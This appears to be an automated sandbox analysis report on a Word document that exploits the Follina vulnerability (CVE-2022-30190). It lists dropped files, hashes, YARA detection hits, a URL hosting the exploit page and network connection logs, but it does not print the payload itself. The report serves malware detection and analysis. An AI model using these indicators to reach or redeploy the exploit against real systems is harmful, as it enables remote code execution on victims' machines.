SHA-512:	73E55B24AE1DE1794745B1C168ACDFDDF8F15BD7DB611867773CA94BB9A8688D46D3E781B1AAE274879E002043465B03A1736BA7FA5D563F9AA67C459F649710
Malicious:	true
Yara Hits:	Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\poc[1].htm, Author: Nasreddine Bencherchali, Christian Burkard Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\poc[1].htm, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\poc[1].htm, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
IE Cache URL:	https://2hell.nl/follina/poc.html
Preview:	<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BF80B4F.htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	6774
Entropy (8bit):	0.7823015818904822
Encrypted:	false
SSDEEP:	6:qTFQzhqIAXMzSKWEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEM:qTWvzSsAxH8d2GZfgGw1sue4kVM1Gb
MD5:	EA3FE2CB4B8E3C7AFA0C773A28742AA8
SHA1:	FC00C991825CFE83AC01AD60D9BCE9E5DE2D061D
SHA-256:	8D68FC5C45CDFD449252B1E3E2EC8A1E35E00C83532628102E5F699A1190D101
SHA-512:	73E55B24AE1DE1794745B1C168ACDFDDF8F15BD7DB611867773CA94BB9A8688D46D3E781B1AAE274879E002043465B03A1736BA7FA5D563F9AA67C459F649710
Malicious:	true
Yara Hits:	Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BF80B4F.htm, Author: Nasreddine Bencherchali, Christian Burkard Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BF80B4F.htm, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BF80B4F.htm, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
Preview:	<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D314135.htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	6774
Entropy (8bit):	0.7823015818904822
Encrypted:	false
SSDEEP:	6:qTFQzhqIAXMzSKWEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEM:qTWvzSsAxH8d2GZfgGw1sue4kVM1Gb
MD5:	EA3FE2CB4B8E3C7AFA0C773A28742AA8
SHA1:	FC00C991825CFE83AC01AD60D9BCE9E5DE2D061D
SHA-256:	8D68FC5C45CDFD449252B1E3E2EC8A1E35E00C83532628102E5F699A1190D101
SHA-512:	73E55B24AE1DE1794745B1C168ACDFDDF8F15BD7DB611867773CA94BB9A8688D46D3E781B1AAE274879E002043465B03A1736BA7FA5D563F9AA67C459F649710
Malicious:	true
Yara Hits:	Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D314135.htm, Author: Nasreddine Bencherchali, Christian Burkard Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D314135.htm, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D314135.htm, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
Preview:	<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{FB6581E1-1A5E-4649-84C2-3FA331ABA6D2}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	2.0826917413964643
Encrypted:	false
SSDEEP:	12:rl3bn+LFI/SBYd09aiZ/t21U/hCKoDyzRDHcIxC/0GcIFn7iVjrRDHuKo4CIz4zc:rL/dK/nLRDH+niFRDHFRvxXorniWlo
MD5:	754C7DA115CD19CB9E6C3948128B0E3B
SHA1:	1FF961744798D170810B0BC310F7C22B7355FEA2
SHA-256:	3E426FA1EF8F541849E5710B49E5C25E19A9E568E19A4ECBD5A18EF9941B2919
SHA-512:	8CE245544C0794D4522D10EFBE00814845E18AA51DA4E99A37980EB565E4ED447AF3899C36F9E7D606D8FE06775F4A9F6EB21587C2842FBF6DD2B29CE981DABB
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{908054AA-4410-45BE-A60F-B0BC543AE3BB}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	0.898955158116908
Encrypted:	false
SSDEEP:	6:FlgI5lNcYcbsPFjK/WmP9+7giP4n4PxZUtBs/6:Flvc8KS7gJGZO
MD5:	549518436A2C4B97E9422E1AEC32E432
SHA1:	EEDC2867A3EA3EDB16E3FB52CA3ADEF8908B6DF1
SHA-256:	A2DD71C1827995791EEBB3170D3730645F313B9099C17F234443DB289ABBA1C4
SHA-512:	DF367523A22321691356CD49FFCE10B772B5E8F0E05377FA4B57BFAA74F5CAB757679FAEEDFB5D0F382AC74E3D23B9FA16B192A311B39A503A6E14E14DAA0908
Malicious:	false
Preview:	....L.I.N.K. .h.t.m.l.f.i.l.e. .".h.t.t.p.s.:././.2.h.e.l.l...n.l./.f.o.l.l.i.n.a./.p.o.c...h.t.m.l.!.". .".". .\.p. .\.f. .0..... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9DD68104-9F74-4147-BF67-D8C1A9A331E2}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{021E1AC8-4DA2-4E7A-B16F-AFF6C99BD5E3}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02555472380356475
Encrypted:	false
SSDEEP:	6:I3DPc0/VvxggLRzFIrnLGtRXv//4tfnRujlw//+GtluJ/eRuj:I3DPn/ZCrnIvYg3J/
MD5:	E7911CB21AB21ABF6D89358D6702668E
SHA1:	75B4F3034A40010A0064E588C100D56D0B794118
SHA-256:	E521F2141D1EB1690CE92108E94E8743E10608499707E72CF8E2D3FD18A6ED03
SHA-512:	FD49A4268F7C4887483DF721F8DFF33B6C513B01ADA44B33228F8FAE26660EE8D69278DA072A4C2D64505208049337C277AE4B421C6F14428AFA1DC48C5E1987
Malicious:	false
Preview:	......M.eFy...z=3..=.M.H.K.t..S,...X.F...Fa.q............................{..t.w.H.0(..S.?.........R@....C...t...Z.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{161C39B1-451E-4070-AE08-AFF8D45B0D9D}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02554110170684297
Encrypted:	false
SSDEEP:	6:I3DPcFi8TVvxggLRjulTw1XlYPf7/RXv//4tfnRujlw//+GtluJ/eRuj:I3DPWPdP4U1XqH7pvYg3J/
MD5:	D5BB7E24CE5A19D0A36F70C87DFE89E8
SHA1:	008D3EA4CF3DB6239AEEE6E092BEF43992EC2FC3
SHA-256:	AF13BE6172560EB428222CFA28013BE34B98DB55AE7D0FDCE0E91F6405FD22D3
SHA-512:	95BF9A3BE65CD6ABA10EB9FEFD8502F275C2020D30EDB412BD90B536F1EC4DA5946F7ED6EA7F81FC528E07A2811606C06CA28621D5089A2F7474138266E0BEAA
Malicious:	false
Preview:	......M.eFy...z(`.g,.*D...o...3S,...X.F...Fa.q..............................."}>>C...b6.tu..........a..8O..7..-.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\fHER4lglqY.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Aug 18 09:26:01 2022, mtime=Thu Aug 18 09:26:01 2022, atime=Thu Aug 18 09:26:11 2022, length=12260, window=hide
Category:	dropped
Size (bytes):	1019
Entropy (8bit):	4.569563658423784
Encrypted:	false
SSDEEP:	12:8bl80gXg/XAlCPCHaXRBktB/LAJX+WoDjuicvbIsYJ4hNDtZ3YilMMEpxRljK3w9:8uk/XThOkeHNeMsYuDv3qcTu7D
MD5:	FE7E32F5C42E82CAF2EE7F0826F4F2D3
SHA1:	057A06D484B3959E7307D0356B67B41D3C5F4C87
SHA-256:	D69CA660603491620A4F41EC06A83A183832847C991569AA5A1FE543E4A3BA5B
SHA-512:	ABDB997CE84CBB2C83D391D3A4168FC8E8169CA556B5F55DB407D0304AF67432BA4212F4978B27083B274120863502735B7A3A3A562E2E7BE797A2287E7AD0B8
Malicious:	false
Preview:	L..................F.... .............F......./...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT.....&=....U...............A.l.b.u.s.....z.1......UAS..Desktop.d......QK.X.UAS..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2../...UFS .FHER4L~1.DOC..L.......UAS.UAS.........................f.H.E.R.4.l.g.l.q.Y...d.o.c.x.......y...............-...8...[............?J......C:\Users\..#...................\\887849\Users.user\Desktop\fHER4lglqY.docx.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.f.H.E.R.4.l.g.l.q.Y...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......887849..........D_....3N...W...9G..N..... .....[D_....3N...W...9G

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.759882730988537
Encrypted:	false
SSDEEP:	3:bDuMJlb4JipzCmxWItg3RJipzCv:bCQEiBqiBs
MD5:	AADFD38DB75E156799C4CEC091515464
SHA1:	A3FD60947600D1F2216CF172352BD39DA775E4FA
SHA-256:	8929BCDAB20E01FDAE7BD030860DF319AAB030241B52BB5E469C464FC7D60BC6
SHA-512:	7A63884E252637DE3A43EEF2055A6108E16161689876D5EE2E3A28364558CCD4CCD6A6B8A38AEA21A4F8FCC9A88A67CFBF19C7455B24E34541954FEE44EDC4BE
Malicious:	false
Preview:	[folders]..Templates.LNK=0..fHER4lglqY.LNK=0..[misc]..fHER4lglqY.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
MD5:	7CFA404FD881AF8DF49EA584FE153C61
SHA1:	32D9BF92626B77999E5E44780BF24130F3D23D66
SHA-256:	248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
SHA-512:	F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...

C:\Users\user\Desktop\~$ER4lglqY.docx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
MD5:	7CFA404FD881AF8DF49EA584FE153C61
SHA1:	32D9BF92626B77999E5E44780BF24130F3D23D66
SHA-256:	248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
SHA-512:	F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...

Static File Info

General

File type:	Microsoft Word 2007+
Entropy (8bit):	7.273550678614421
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	fHER4lglqY.docx
File size:	12260
MD5:	6878265f91c6cb31618ad8ff45891f60
SHA1:	178c99c6b3ad6e1e835b2325b0d9a023d61d6d64
SHA256:	2f75f6ee9ba9ef599dff95249a32312bb457ea34d5e25dec338b803c312221a0
SHA512:	b41459bcf66f1e9d77e21cc27fc940ec04559a352b38c236f659734b697c5d9a33d26ca905be9af482cbef230f586c93c9a5f666083dd6a3e9e8894d63753f15
SSDEEP:	192:Ctv4DlKdmUGQ3CI1Ymkh+4wyuDUIKew+Wfm0FfkvGUlfLXaqEGF6:av4JORSIHkh/ruDUIs+30OnTge6
TLSH:	E8428D38CB50F874C42789FDAA8883F2E7895447E217546E2484E3998650593973BADF
File Content Preview:	PK..........!....lZ... .......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e6a2a2a4b4b4a4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 18, 2022 03:26:14.182174921 CEST	49173	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:14.182254076 CEST	443	49173	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:14.182373047 CEST	49173	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:14.203026056 CEST	49173	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:14.203078032 CEST	443	49173	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:14.306660891 CEST	443	49173	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:14.306756020 CEST	49173	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:14.314047098 CEST	49173	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:14.314063072 CEST	443	49173	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:14.314338923 CEST	443	49173	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:14.314404964 CEST	49173	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:14.565172911 CEST	49173	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:14.593014002 CEST	443	49173	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:14.593157053 CEST	49173	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:14.593182087 CEST	443	49173	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:14.593221903 CEST	443	49173	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:14.593276978 CEST	49173	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:14.593307972 CEST	49173	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:14.593504906 CEST	49173	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:14.593527079 CEST	443	49173	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:14.593561888 CEST	49173	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:14.593609095 CEST	49173	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:19.983845949 CEST	49174	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:19.983912945 CEST	443	49174	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:19.983988047 CEST	49174	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:19.984257936 CEST	49174	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:19.984275103 CEST	443	49174	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:20.039246082 CEST	443	49174	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:20.039416075 CEST	49174	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:20.046616077 CEST	49174	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:20.046659946 CEST	443	49174	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:20.047168016 CEST	443	49174	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:20.075588942 CEST	49174	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:20.102585077 CEST	443	49174	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:20.102710962 CEST	443	49174	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:20.102804899 CEST	49174	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:20.102861881 CEST	49174	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:20.102888107 CEST	443	49174	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:20.102916002 CEST	49174	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:20.102926016 CEST	443	49174	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:24.832207918 CEST	49175	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:24.832277060 CEST	443	49175	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:24.832361937 CEST	49175	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:24.837711096 CEST	49175	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:24.837760925 CEST	443	49175	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:24.895754099 CEST	443	49175	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:24.895880938 CEST	49175	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:24.906800985 CEST	49175	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:24.906837940 CEST	443	49175	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:24.908533096 CEST	443	49175	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:24.960191965 CEST	49175	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:24.988162041 CEST	443	49175	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:24.988338947 CEST	443	49175	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:24.988435030 CEST	49175	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:24.988894939 CEST	49175	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:24.988931894 CEST	443	49175	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:24.988950014 CEST	49175	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:24.988965034 CEST	443	49175	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:24.989316940 CEST	49176	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:24.989362955 CEST	443	49176	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:24.989552975 CEST	49176	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:24.989753008 CEST	49176	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:24.989768982 CEST	443	49176	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:25.043608904 CEST	443	49176	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:25.052735090 CEST	49176	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:25.052793026 CEST	443	49176	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:25.053524971 CEST	49176	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:25.053544044 CEST	443	49176	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:25.094947100 CEST	443	49176	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:25.095072031 CEST	443	49176	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:25.095199108 CEST	49176	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:25.095341921 CEST	49176	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:25.095379114 CEST	443	49176	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:25.095484018 CEST	49176	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:25.095496893 CEST	443	49176	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:27.518024921 CEST	49177	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:27.518086910 CEST	443	49177	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:27.518208027 CEST	49177	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:27.518573046 CEST	49177	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:27.518604040 CEST	443	49177	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:27.575459003 CEST	443	49177	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:27.575592995 CEST	49177	443	192.168.2.22	178.21.112.152
